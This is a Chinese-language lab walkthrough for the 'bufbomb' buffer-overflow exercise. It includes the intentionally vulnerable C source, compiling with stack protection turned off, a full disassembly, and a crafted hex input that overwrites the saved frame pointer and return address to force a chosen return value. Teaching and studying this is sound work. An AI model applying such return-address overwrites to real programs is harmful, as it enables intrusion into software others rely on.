
1. 获得bufbomb.c
/* code for bufbomb.c */
C语言: 高亮代码由发芽网提供
01 /* Bomb program that is solved using a buffer overflow attack */
03 #include
04 #include
05 #include
07 /* Like gets, except that characters are typed as pairs of hex digits.
08    Nondigit characters are ignored.  Stops when encounters newline */
09 char * getxs( char * dest)
10 {
11     int c;
12     int even = 1; /* Have read even number of digits */
13     int otherd = 0; /* Other hex digit of pair */
14     char *sp = dest;
15     while (( c = getchar()) != EOF && c != '\n') {
16     if ( isxdigit( c)) {
17         int val;
18         if ( '0' <= c && c <= '9')
19         val = c - '0';
20         else if ( 'A' <= c && c <= 'F')
21         val = c - 'A' + 10;
22         else
23         val = c - 'a' + 10;
24         if ( even) {
25         otherd = val;
26         even = 0;
27         } else {
28         *sp ++ = otherd * 16 + val;
29         even = 1;
30         }
31     }
32     }
33     *sp ++ = '\0';
34     return dest;
35 }
37 /* $begin getbuf-c */
38 int getbuf()
39 {
40     char buf [ 12 ];
41     getxs( buf);
42     return 1;
43 }
45 void test()
46 {
47     int val;
48     int array [ 1 ];
49     printf( "Local variable at %p \n " , array);
50     printf( "Type Hex string:");
51     val = getbuf();
52     printf( "getbuf returned 0x%x \n " , val);
53 }
54 /* $end getbuf-c */
56 int main()
57 {
59     int buf [ 16 ];
60     /* This little hack is an attempt to get the stack to be in a
61        stable position.  By experiment, found that position of stack
62        varies by one program execution to the next, but only in the low
63        order 23 bits.
64     */
65     int offset = ((( int) buf) & 0x7FFFFF);
66     int * space = ( int *) alloca( offset);
67     * space = 0; /* So that don't get complaint of unused variable */
68     printf( "Added offset 0x%x, should move stack to around %p \n " ,
69        offset , ( char *) buf - offset);
70     test();
71     return 0;
72 }

2. 查看gcc版本
    gcc --version

3. 关闭堆栈保护机制进行编译(使用-fno-stack-protector编译选项)。
   gcc -o bufbomb bufbomb.c -fno-stack-protector

4. 反汇编bufbomb
    objdump -d bufbomb > NP_bufbomb.s
使用NP_bufbomb.s是为了表明No stack Protector, :-)
/* code for NP_bufbomb.s */
GAS语言: 高亮代码由发芽网提供
bufbomb:     file format elf32 - i386

Disassembly of section .init :

08048328 < _init > :
8048328:    55                       push   %ebp
8048329:    89 e5                    mov    %esp , %ebp
804832 b:    53                       push   %ebx
804832 c:    83 ec 04                 sub    $0x4 , %esp
804832 f:    e8 00 00 00 00           call   8048334 < _init + 0xc >
8048334:    5b                       pop    %ebx
8048335:    81 c3 c0 1 c 00 00        add    $0x1cc0 , %ebx
804833 b:    8b 93 fc ff ff ff        mov    - 0x4( %ebx ), %edx
8048341:    85 d2                    test   %edx , %edx
8048343:    74 05                    je     804834a < _init + 0x22 >
8048345:    e8 2 e 00 00 00           call   8048378 < __gmon_start__@plt >
804834 a:    e8 01 01 00 00           call   8048450 < frame_dummy >
804834 f:    e8 3 c 03 00 00           call   8048690 < __do_global_ctors_aux >
8048354:    58                       pop    %eax
8048355:    5b                       pop    %ebx
8048356:    c9                       leave 
8048357 :    c3                       ret   

Disassembly of section .plt :

08048358 < getchar@plt - 0x10 > :
8048358:    ff 35 f8 9 f 04 08        pushl  0x8049ff8
804835 e:    ff 25 fc 9 f 04 08        jmp    * 0x8049ffc
8048364:    00 00                    add    %al ,( %eax)

08048368 < getchar@plt > :
8048368:    ff 25 00 a0 04 08        jmp    * 0x804a000
804836 e:    68 00 00 00 00           push   $0x0
8048373:    e9 e0 ff ff ff           jmp    8048358 < _init + 0x30 >

08048378 < __gmon_start__@plt > :
8048378:    ff 25 04 a0 04 08        jmp    * 0x804a004
804837 e:    68 08 00 00 00           push   $0x8
8048383:    e9 d0 ff ff ff           jmp    8048358 < _init + 0x30 >

08048388 < __libc_start_main@plt > :
8048388:    ff 25 08 a0 04 08        jmp    * 0x804a008
804838 e:    68 10 00 00 00           push   $0x10
8048393:    e9 c0 ff ff ff           jmp    8048358 < _init + 0x30 >

08048398 < __ctype_b_loc@plt > :
8048398:    ff 25 0 c a0 04 08        jmp    * 0x804a00c
804839 e:    68 18 00 00 00           push   $0x18
80483 a3:    e9 b0 ff ff ff           jmp    8048358 < _init + 0x30 >

080483 a8 < printf@plt > :
80483 a8:    ff 25 10 a0 04 08        jmp    * 0x804a010
80483 ae:    68 20 00 00 00           push   $0x20
80483 b3:    e9 a0 ff ff ff           jmp    8048358 < _init + 0x30 >

Disassembly of section .text :

080483 c0 < _start > :
80483 c0:    31 ed                    xor    %ebp , %ebp
80483 c2:    5 e                       pop    %esi
80483 c3:    89 e1                    mov    %esp , %ecx
80483 c5:    83 e4 f0                 and    $0xfffffff0 , %esp
80483 c8:    50                       push   %eax
80483 c9:    54                       push   %esp
80483 ca:    52                       push   %edx
80483 cb:    68 20 86 04 08           push   $0x8048620
80483 d0:    68 30 86 04 08           push   $0x8048630
80483 d5:    51                       push   %ecx
80483 d6:    56                       push   %esi
80483 d7:    68 a0 85 04 08           push   $0x80485a0
80483 dc:    e8 a7 ff ff ff           call   8048388 < __libc_start_main@plt >
80483 e1:    f4                       hlt   
80483 e2 :    90                       nop
80483 e3:    90                       nop
80483 e4:    90                       nop
80483 e5:    90                       nop
80483 e6:    90                       nop
80483 e7:    90                       nop
80483 e8:    90                       nop
80483 e9:    90                       nop
80483 ea:    90                       nop
80483 eb:    90                       nop
80483 ec:    90                       nop
80483 ed:    90                       nop
80483 ee:    90                       nop
80483 ef:    90                       nop

080483 f0 < __do_global_dtors_aux > :
80483 f0:    55                       push   %ebp
80483 f1:    89 e5                    mov    %esp , %ebp
80483 f3:    53                       push   %ebx
80483 f4:    83 ec 04                 sub    $0x4 , %esp
80483 f7:    80 3 d 1 c a0 04 08 00     cmpb   $0x0 , 0x804a01c
80483 fe:    75 3 f                    jne    804843f < __do_global_dtors_aux + 0x4f >
8048400:    a1 20 a0 04 08           mov    0x804a020 , %eax
8048405:    bb 18 9 f 04 08           mov    $0x8049f18 , %ebx
804840 a:    81 eb 14 9 f 04 08        sub    $0x8049f14 , %ebx
8048410:    c1 fb 02                 sar    $0x2 , %ebx
8048413:    83 eb 01                 sub    $0x1 , %ebx
8048416:    39 d8                    cmp    %ebx , %eax
8048418:    73 1 e                    jae    8048438 < __do_global_dtors_aux + 0x48 >
804841 a:    8 d b6 00 00 00 00        lea    0x0( %esi ), %esi
8048420:    83 c0 01                 add    $0x1 , %eax
8048423:    a3 20 a0 04 08           mov    %eax , 0x804a020
8048428:    ff 14 85 14 9 f 04 08     call   * 0x8049f14 (, %eax , 4)
804842 f:    a1 20 a0 04 08           mov    0x804a020 , %eax
8048434:    39 d8                    cmp    %ebx , %eax
8048436:    72 e8                    jb     8048420 < __do_global_dtors_aux + 0x30 >
8048438:    c6 05 1 c a0 04 08 01     movb   $0x1 , 0x804a01c
804843 f:    83 c4 04                 add    $0x4 , %esp
8048442:    5b                       pop    %ebx
8048443:    5 d                       pop    %ebp
8048444:    c3                       ret   
8048445 :    8 d 74 26 00              lea    0x0( %esi , %eiz , 1 ), %esi
8048449:    8 d bc 27 00 00 00 00     lea    0x0( %edi , %eiz , 1 ), %edi

08048450 < frame_dummy > :
8048450:    55                       push   %ebp
8048451:    89 e5                    mov    %esp , %ebp
8048453:    83 ec 18                 sub    $0x18 , %esp
8048456:    a1 1 c 9 f 04 08           mov    0x8049f1c , %eax
804845 b:    85 c0                    test   %eax , %eax
804845 d:    74 12                    je     8048471 < frame_dummy + 0x21 >
804845 f:    b8 00 00 00 00           mov    $0x0 , %eax
8048464:    85 c0                    test   %eax , %eax
8048466:    74 09                    je     8048471 < frame_dummy + 0x21 >
8048468:    c7 04 24 1 c 9 f 04 08     movl   $0x8049f1c ,( %esp)
804846 f:    ff d0                    call   * %eax
8048471:    c9                       leave 
8048472 :    c3                       ret   
8048473 :    90                       nop

08048474 < getxs > :
8048474:    55                       push   %ebp
8048475:    89 e5                    mov    %esp , %ebp
8048477:    83 ec 28                 sub    $0x28 , %esp
804847 a:    c7 45 e8 01 00 00 00     movl   $0x1 ,- 0x18( %ebp)
8048481:    c7 45 ec 00 00 00 00     movl   $0x0 ,- 0x14( %ebp)
8048488:    8b 45 08                 mov    0x8( %ebp ), %eax
804848 b:    89 45 f0                 mov    %eax ,- 0x10( %ebp)
804848 e:    e9 89 00 00 00           jmp    804851c < getxs + 0xa8 >
8048493:    e8 00 ff ff ff           call   8048398 < __ctype_b_loc@plt >
8048498:    8b 00                    mov    ( %eax ), %eax
804849 a:    8b 55 e4                 mov    - 0x1c( %ebp ), %edx
804849 d:    01 d2                    add    %edx , %edx
804849 f:    01 d0                    add    %edx , %eax
80484 a1:    0 f b7 00                 movzwl ( %eax ), %eax
80484 a4:    0 f b7 c0                 movzwl %ax , %eax
80484 a7:    25 00 10 00 00           and    $0x1000 , %eax
80484 ac:    85 c0                    test   %eax , %eax
80484 ae:    74 6 c                    je     804851c < getxs + 0xa8 >
80484 b0:    83 7 d e4 2 f              cmpl   $0x2f ,- 0x1c( %ebp)
80484 b4:    7 e 11                    jle    80484c7 < getxs + 0x53 >
80484 b6:    83 7 d e4 39              cmpl   $0x39 ,- 0x1c( %ebp)
80484 ba:    7 f 0b                    jg     80484c7 < getxs + 0x53 >
80484 bc:    8b 45 e4                 mov    - 0x1c( %ebp ), %eax
80484 bf:    83 e8 30                 sub    $0x30 , %eax
80484 c2:    89 45 f4                 mov    %eax ,- 0xc( %ebp)
80484 c5:    eb 20                    jmp    80484e7 < getxs + 0x73 >
80484 c7:    83 7 d e4 40              cmpl   $0x40 ,- 0x1c( %ebp)
80484 cb:    7 e 11                    jle    80484de < getxs + 0x6a >
80484 cd:    83 7 d e4 46              cmpl   $0x46 ,- 0x1c( %ebp)
80484 d1:    7 f 0b                    jg     80484de < getxs + 0x6a >
80484 d3:    8b 45 e4                 mov    - 0x1c( %ebp ), %eax
80484 d6:    83 e8 37                 sub    $0x37 , %eax
80484 d9:    89 45 f4                 mov    %eax ,- 0xc( %ebp)
80484 dc:    eb 09                    jmp    80484e7 < getxs + 0x73 >
80484 de:    8b 45 e4                 mov    - 0x1c( %ebp ), %eax
80484 e1:    83 e8 57                 sub    $0x57 , %eax
80484 e4:    89 45 f4                 mov    %eax ,- 0xc( %ebp)
80484 e7:    83 7 d e8 00              cmpl   $0x0 ,- 0x18( %ebp)
80484 eb:    74 0 f                    je     80484fc < getxs + 0x88 >
80484 ed:    8b 45 f4                 mov    - 0xc( %ebp ), %eax
80484 f0:    89 45 ec                 mov    %eax ,- 0x14( %ebp)
80484 f3:    c7 45 e8 00 00 00 00     movl   $0x0 ,- 0x18( %ebp)
80484 fa:    eb 20                    jmp    804851c < getxs + 0xa8 >
80484 fc:    8b 45 ec                 mov    - 0x14( %ebp ), %eax
80484 ff:    89 c2                    mov    %eax , %edx
8048501:    c1 e2 04                 shl    $0x4 , %edx
8048504:    8b 45 f4                 mov    - 0xc( %ebp ), %eax
8048507:    8 d 04 02                 lea    ( %edx , %eax , 1 ), %eax
804850 a:    89 c2                    mov    %eax , %edx
804850 c:    8b 45 f0                 mov    - 0x10( %ebp ), %eax
804850 f:    88 10                    mov    %dl ,( %eax)
8048511:    83 45 f0 01              addl   $0x1 ,- 0x10( %ebp)
8048515:    c7 45 e8 01 00 00 00     movl   $0x1 ,- 0x18( %ebp)
804851 c:    e8 47 fe ff ff           call   8048368 < getchar@plt >
8048521:    89 45 e4                 mov    %eax ,- 0x1c( %ebp)
8048524:    83 7 d e4 ff              cmpl   $0xffffffff ,- 0x1c( %ebp)
8048528:    74 0 a                    je     8048534 < getxs + 0xc0 >
804852 a:    83 7 d e4 0 a              cmpl   $0xa ,- 0x1c( %ebp)
804852 e:    0 f 85 5 f ff ff ff        jne    8048493 < getxs + 0x1f >
8048534:    8b 45 f0                 mov    - 0x10( %ebp ), %eax
8048537:    c6 00 00                 movb   $0x0 ,( %eax)
804853 a:    83 45 f0 01              addl   $0x1 ,- 0x10( %ebp)
804853 e:    8b 45 08                 mov    0x8( %ebp ), %eax
8048541:    c9                       leave 
8048542 :    c3                       ret   

08048543 < getbuf >:
8048543:    55                       push   %ebp
8048544:    89 e5                    mov    %esp , %ebp
8048546:    83 ec 28                 sub    $0x28 , %esp
8048549:    8 d 45 ec                 lea    - 0x14( %ebp ), %eax
804854 c:    89 04 24                 mov    %eax ,( %esp)
804854 f:    e8 20 ff ff ff           call   8048474 < getxs >
8048554:    b8 01 00 00 00           mov    $0x1 , %eax
8048559:    c9                       leave 
804855 a :    c3                       ret   

0804855b < test >:
804855 b:    55                       push   %ebp
804855 c:    89 e5                    mov    %esp , %ebp
804855 e:    83 ec 28                 sub    $0x28 , %esp
8048561:    b8 e0 86 04 08           mov    $0x80486e0 , %eax
8048566:    8 d 55 f0                 lea    - 0x10( %ebp ), %edx
8048569:    89 54 24 04              mov    %edx , 0x4( %esp)
804856 d:    89 04 24                 mov    %eax ,( %esp)
8048570:    e8 33 fe ff ff           call   80483a8 < printf@plt >
8048575:    b8 f6 86 04 08           mov    $0x80486f6 , %eax
804857 a:    89 04 24                 mov    %eax ,( %esp)
804857 d:    e8 26 fe ff ff           call   80483a8 < printf@plt >
8048582:    e8 bc ff ff ff           call   8048543 < getbuf >
8048587:    89 45 f4                 mov    %eax ,- 0xc( %ebp)
804858 a:    b8 07 87 04 08           mov    $0x8048707 , %eax
804858 f:    8b 55 f4                 mov    - 0xc( %ebp ), %edx
8048592:    89 54 24 04              mov    %edx , 0x4( %esp)
8048596:    89 04 24                 mov    %eax ,( %esp)
8048599:    e8 0 a fe ff ff           call   80483a8 < printf@plt >
804859 e:    c9                       leave 
804859 f :    c3                       ret   

080485a0 < main >:
80485 a0:    8 d 4 c 24 04              lea    0x4( %esp ), %ecx
80485 a4:    83 e4 f0                 and    $0xfffffff0 , %esp
80485 a7:    ff 71 fc                 pushl  - 0x4( %ecx)
80485 aa:    55                       push   %ebp
80485 ab:    89 e5                    mov    %esp , %ebp
80485 ad:    51                       push   %ecx
80485 ae:    83 ec 64                 sub    $0x64 , %esp
80485 b1:    8 d 45 b0                 lea    - 0x50( %ebp ), %eax
80485 b4:    25 ff ff 7 f 00           and    $0x7fffff , %eax
80485 b9:    89 45 f0                 mov    %eax ,- 0x10( %ebp)
80485 bc:    8b 45 f0                 mov    - 0x10( %ebp ), %eax
80485 bf:    83 c0 0 f                 add    $0xf , %eax
80485 c2:    83 c0 0 f                 add    $0xf , %eax
80485 c5:    c1 e8 04                 shr    $0x4 , %eax
80485 c8:    c1 e0 04                 shl    $0x4 , %eax
80485 cb:    29 c4                    sub    %eax , %esp
80485 cd:    8 d 44 24 0 c              lea    0xc( %esp ), %eax
80485 d1:    83 c0 0 f                 add    $0xf , %eax
80485 d4:    c1 e8 04                 shr    $0x4 , %eax
80485 d7:    c1 e0 04                 shl    $0x4 , %eax
80485 da:    89 45 f4                 mov    %eax ,- 0xc( %ebp)
80485 dd:    8b 45 f4                 mov    - 0xc( %ebp ), %eax
80485 e0:    c7 00 00 00 00 00        movl   $0x0 ,( %eax)
80485 e6:    8 d 45 b0                 lea    - 0x50( %ebp ), %eax
80485 e9:    8b 55 f0                 mov    - 0x10( %ebp ), %edx
80485 ec:    f7 da                    neg    %edx
80485 ee:    8 d 14 10                 lea    ( %eax , %edx , 1 ), %edx
80485 f1:    b8 20 87 04 08           mov    $0x8048720 , %eax
80485 f6:    89 54 24 08              mov    %edx , 0x8( %esp)
80485 fa:    8b 55 f0                 mov    - 0x10( %ebp ), %edx
80485 fd:    89 54 24 04              mov    %edx , 0x4( %esp)
8048601:    89 04 24                 mov    %eax ,( %esp)
8048604:    e8 9 f fd ff ff           call   80483a8 < printf@plt >
8048609:    e8 4 d ff ff ff           call   804855b < test >
804860 e:    b8 00 00 00 00           mov    $0x0 , %eax
8048613:    8b 4 d fc                 mov    - 0x4( %ebp ), %ecx
8048616:    c9                       leave 
8048617 :    8 d 61 fc                 lea    - 0x4( %ecx ), %esp
804861 a:    c3                       ret   
804861b :    90                       nop
804861 c:    90                       nop
804861 d:    90                       nop
804861 e:    90                       nop
804861 f:    90                       nop

08048620 < __libc_csu_fini > :
8048620:    55                       push   %ebp
8048621:    89 e5                    mov    %esp , %ebp
8048623:    5 d                       pop    %ebp
8048624:    c3                       ret   
8048625 :    8 d 74 26 00              lea    0x0( %esi , %eiz , 1 ), %esi
8048629:    8 d bc 27 00 00 00 00     lea    0x0( %edi , %eiz , 1 ), %edi

08048630 < __libc_csu_init > :
8048630:    55                       push   %ebp
8048631:    89 e5                    mov    %esp , %ebp
8048633:    57                       push   %edi
8048634:    56                       push   %esi
8048635:    53                       push   %ebx
8048636:    e8 4 f 00 00 00           call   804868a < __i686.get_pc_thunk.bx >
804863 b:    81 c3 b9 19 00 00        add    $0x19b9 , %ebx
8048641:    83 ec 1 c                 sub    $0x1c , %esp
8048644:    e8 df fc ff ff           call   8048328 < _init >
8048649:    8 d bb 18 ff ff ff        lea    - 0xe8( %ebx ), %edi
804864 f:    8 d 83 18 ff ff ff        lea    - 0xe8( %ebx ), %eax
8048655:    29 c7                    sub    %eax , %edi
8048657:    c1 ff 02                 sar    $0x2 , %edi
804865 a:    85 ff                    test   %edi , %edi
804865 c:    74 24                    je     8048682 < __libc_csu_init + 0x52 >
804865 e:    31 f6                    xor    %esi , %esi
8048660:    8b 45 10                 mov    0x10( %ebp ), %eax
8048663:    89 44 24 08              mov    %eax , 0x8( %esp)
8048667:    8b 45 0 c                 mov    0xc( %ebp ), %eax
804866 a:    89 44 24 04              mov    %eax , 0x4( %esp)
804866 e:    8b 45 08                 mov    0x8( %ebp ), %eax
8048671:    89 04 24                 mov    %eax ,( %esp)
8048674:    ff 94 b3 18 ff ff ff     call   *- 0xe8( %ebx , %esi , 4)
804867 b:    83 c6 01                 add    $0x1 , %esi
804867 e:    39 fe                    cmp    %edi , %esi
8048680:    72 de                    jb     8048660 < __libc_csu_init + 0x30 >
8048682:    83 c4 1 c                 add    $0x1c , %esp
8048685:    5b                       pop    %ebx
8048686:    5 e                       pop    %esi
8048687:    5 f                       pop    %edi
8048688:    5 d                       pop    %ebp
8048689:    c3                       ret   

0804868a < __i686.get_pc_thunk.bx >:
804868 a:    8b 1 c 24                 mov    ( %esp ), %ebx
804868 d:    c3                       ret   
804868 e :    90                       nop
804868 f:    90                       nop

08048690 < __do_global_ctors_aux > :
8048690:    55                       push   %ebp
8048691:    89 e5                    mov    %esp , %ebp
8048693:    53                       push   %ebx
8048694:    83 ec 04                 sub    $0x4 , %esp
8048697:    a1 0 c 9 f 04 08           mov    0x8049f0c , %eax
804869 c:    83 f8 ff                 cmp    $0xffffffff , %eax
804869 f:    74 13                    je     80486b4 < __do_global_ctors_aux + 0x24 >
80486 a1:    bb 0 c 9 f 04 08           mov    $0x8049f0c , %ebx
80486 a6:    66 90                    xchg   %ax , %ax
80486 a8:    83 eb 04                 sub    $0x4 , %ebx
80486 ab:    ff d0                    call   * %eax
80486 ad:    8b 03                    mov    ( %ebx ), %eax
80486 af:    83 f8 ff                 cmp    $0xffffffff , %eax
80486 b2:    75 f4                    jne    80486a8 < __do_global_ctors_aux + 0x18 >
80486 b4:    83 c4 04                 add    $0x4 , %esp
80486 b7:    5b                       pop    %ebx
80486 b8:    5 d                       pop    %ebp
80486 b9:    c3                       ret   
80486 ba :    90                       nop
80486 bb:    90                       nop

Disassembly of section .fini :

080486 bc < _fini > :
80486 bc:    55                       push   %ebp
80486 bd:    89 e5                    mov    %esp , %ebp
80486 bf:    53                       push   %ebx
80486 c0:    83 ec 04                 sub    $0x4 , %esp
80486 c3:    e8 00 00 00 00           call   80486c8 < _fini + 0xc >
80486 c8:    5b                       pop    %ebx
80486 c9:    81 c3 2 c 19 00 00        add    $0x192c , %ebx
80486 cf:    e8 1 c fd ff ff           call   80483f0 < __do_global_dtors_aux >
80486 d4:    59                       pop    %ecx
80486 d5:    5b                       pop    %ebx
80486 d6:    c9                       leave 
80486 d7 :    c3                       ret

5. 由于我们的任务是,只简单地对提示符输入一个适当的十六进制字符串,就使getbuf对test返回-559038737(0xdeadbeef)。

1. 通过分析NP_bufbomb.s得到各个过程的栈帧布局,getbuf的返回地址,test中call printf的地址和"getbuf returned 0x%x\n"的地址。
2. 通过使用gdb调试bufbomb得到数组buf的起始地址(注意不是buf的地址!)和test的栈帧地址。
注: 函数参数的地址可根据调用函数前的入栈情况获得(汇编调用C标准库函数都是通过栈来传递参数的);
    栈帧的地址可通过在调试程序时的相应位置使用print /x $ebp获得。

/* there is a picture of stack frame */

6. 分析完毕得到输入串,运行bufbomb,并输入数据:
01 02 03 04 05 06 07 08 09 10 11 12 01 02 03 04 05 06 07 08 c8 ff 7f bf 99 85 04 08 07 87 04 08 ef be ad de

/* there is a picture of result */


前12个(01 02 03 04 05 06 07 08 09 10 11 12)存到buf[0]~buf[11]中。这里的数组buf是getbuf中的,而不是main中的!    

接着的8个(01 02 03 04 05 06 07 08)存到编译器为数组buf多开辟的8个字节中(一般情况下,编译器总是开辟比需要的多一点的空间)。

接下来的c8 ff 7f bf,是test的栈帧指针(0xbf7fffc8)。

然后的99 85 04 08,是新的getbuf的返回地址也是test中最后一个call printf的地址(0x08048599)。其实只要跳过对val的赋值过程即可,这个值不唯一,也可以是0x0804858a。(这个地址跳过了程序用getbuf的返回值0x1修改栈中val所在内存里的值,从而使printf的参数栈中val的内容是我们所输入的0xdeadbeef,当然存储"getbuf returned 0x%x\n"地址的内存单元还是用原值覆盖)

最后的ef be ad de,是我们要得到的输出值(0xdeadbeef)。


自GCC-4.1.0之后,就在编译过程中加入了防溢出的随机数验证机制,在%gs:0x14 中保存一个随机数,用此进行比对,验证溢出与否。同时GCC-4.1.0之后还加入了与溢出有关的几个编译选项,以此控制是否添加溢出验证:
-fstack-protector:启用堆栈保护,不过只为局部变量中含有 char 数组的函数插入保护代码。

输入值必须为两个数字或字母(十六进制允许范围内)一组。(注意源程序中even number,偶数的意思)

注意1:注意输入值与其所在内存中的对应关系(我们输入的值是从低到高进入内存的,按字节(由char buf[12]和getxs决定))!,根据getxs可知,输入的值都会被作为十六进制,如bf被作为0xbf


还有就是一定要使用"objdump -d bufbomb > bufbomb.s"得到bufbomb的反汇编代码。
通过分析bufbomb.s得到栈帧的布局,以及一些必要的地址数据(getbuf的返回地址(需要修改以跳过将getbuf的返回值放到堆栈的指令)和"getbuf returned 0x%x\n"的地址)。再者就是要通过gdb获得数组buf的起始地址(注意不是buf的地址!)和test的栈帧地址。

1. 关于gcc堆栈保护机制,以及%gs:0x14内容的随机性和不可访问性!

2. 关于对关闭和启用gcc堆栈保护机制对生成代码的影响。

3. 如何找出程序中潜在的缓冲区溢出漏洞(现实中往往得不到源程序)。

4. 如何利用程序中的缓冲区溢出漏洞,做一些高级攻击,如植入恶意代码等。

5. 如何防止程序中出现缓冲区溢出漏洞。

